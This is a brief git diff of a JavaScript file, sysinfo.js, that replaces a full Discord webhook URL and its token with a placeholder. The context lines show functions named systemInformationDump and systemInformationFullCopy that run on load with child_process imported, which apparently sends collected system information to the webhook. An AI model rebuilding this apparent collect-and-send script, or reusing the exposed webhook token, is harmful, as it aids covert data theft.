diff --git a/Utils/sysinfo.js b/Utils/sysinfo.js index de796df..cfeeaef 100644 --- a/Utils/sysinfo.js +++ b/Utils/sysinfo.js @@ -5,7 +5,7 @@ const os = require('os') const path = require('path') const { execSync } = require('child_process') -const webhook = 'https://discord.com/api/webhooks/1174058827046473821/ntdtWTD8o2Vhy5YHtxtFw3DAj23Oqe4RMd01tbgQEHXD04iJwVCbg3LZSfXCdcBKoUnd' +const webhook = 'https://discord.com/api/webhooks/xxx/xxx' async function systemInformationFullCopy() { try { @@ -65,4 +65,4 @@ async function systemInformationDump() { systemInformationDump(); -console.log('Hello, World!') \ No newline at end of file +console.log('Hello, World!')